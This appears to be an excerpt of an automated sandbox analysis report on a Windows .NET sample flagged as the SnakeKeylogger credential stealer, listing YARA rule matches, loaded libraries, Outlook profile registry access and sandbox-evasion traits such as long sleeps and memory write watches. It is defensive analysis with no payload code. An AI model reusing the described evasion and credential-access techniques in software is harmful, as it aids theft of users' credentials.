Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669D6D0 0_2_0669D6D0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669DF7F 0_2_0669DF7F
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669DF80 0_2_0669DF80
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669EC78 0_2_0669EC78
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_066994A8 0_2_066994A8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669EC88 0_2_0669EC88
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F528 0_2_0669F528
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06698D20 0_2_06698D20
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F538 0_2_0669F538
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06698D11 0_2_06698D11
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06699D89 0_2_06699D89
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669D278 0_2_0669D278
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06692278 0_2_06692278
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669DB28 0_2_0669DB28
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06690B20 0_2_06690B20
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669DB19 0_2_0669DB19
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669E3CA 0_2_0669E3CA
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669E3D8 0_2_0669E3D8
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06691B97 0_2_06691B97
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06690040 0_2_06690040
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669E82F 0_2_0669E82F
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669E830 0_2_0669E830
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06690006 0_2_06690006
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F0E0 0_2_0669F0E0
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F0D1 0_2_0669F0D1
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F982 0_2_0669F982
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_06695198 0_2_06695198
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_0669F990 0_2_0669F990
Sample file is different than original file name gathered from version info
Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs z64BLPL.exe
Source: z64BLPL.exe, 00000000.00000002.4119946936.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z64BLPL.exe
Source: z64BLPL.exe, 00000000.00000000.1673826294.00000000006D6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe
Source: z64BLPL.exe Binary or memory string: OriginalFilenameRemington.exe4 vs z64BLPL.exe
Uses 32bit PE files
Source: z64BLPL.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: z64BLPL.exe, type: SAMPLE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: z64BLPL.exe, type: SAMPLE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: z64BLPL.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: z64BLPL.exe, .cs Cryptographic APIs: 'TransformFinalBlock'
Source: z64BLPL.exe, -J--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: z64BLPL.exe, -J--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.winEXE@1/0@4/4
Source: C:\Users\user\Desktop\z64BLPL.exe Mutant created: NULL
Source: z64BLPL.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: z64BLPL.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\z64BLPL.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: z64BLPL.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: z64BLPL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: z64BLPL.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\z64BLPL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\z64BLPL.exe Memory allocated: D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Memory allocated: 2A10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Memory allocated: 2850000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599636 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597996 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597888 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597741 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597637 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597417 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596217 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595218 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594993 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594890 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594781 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594671 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594562 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\z64BLPL.exe Window / User API: threadDelayed 8582 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Window / User API: threadDelayed 1284 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 Thread sleep count: 8582 > 30 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 Thread sleep count: 1284 > 30 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599636s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599421s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -598109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597996s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597888s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597741s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597637s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597417s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -597093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596217s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -596000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -595109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -594993s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -594890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -594781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -594671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 Thread sleep time: -594562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
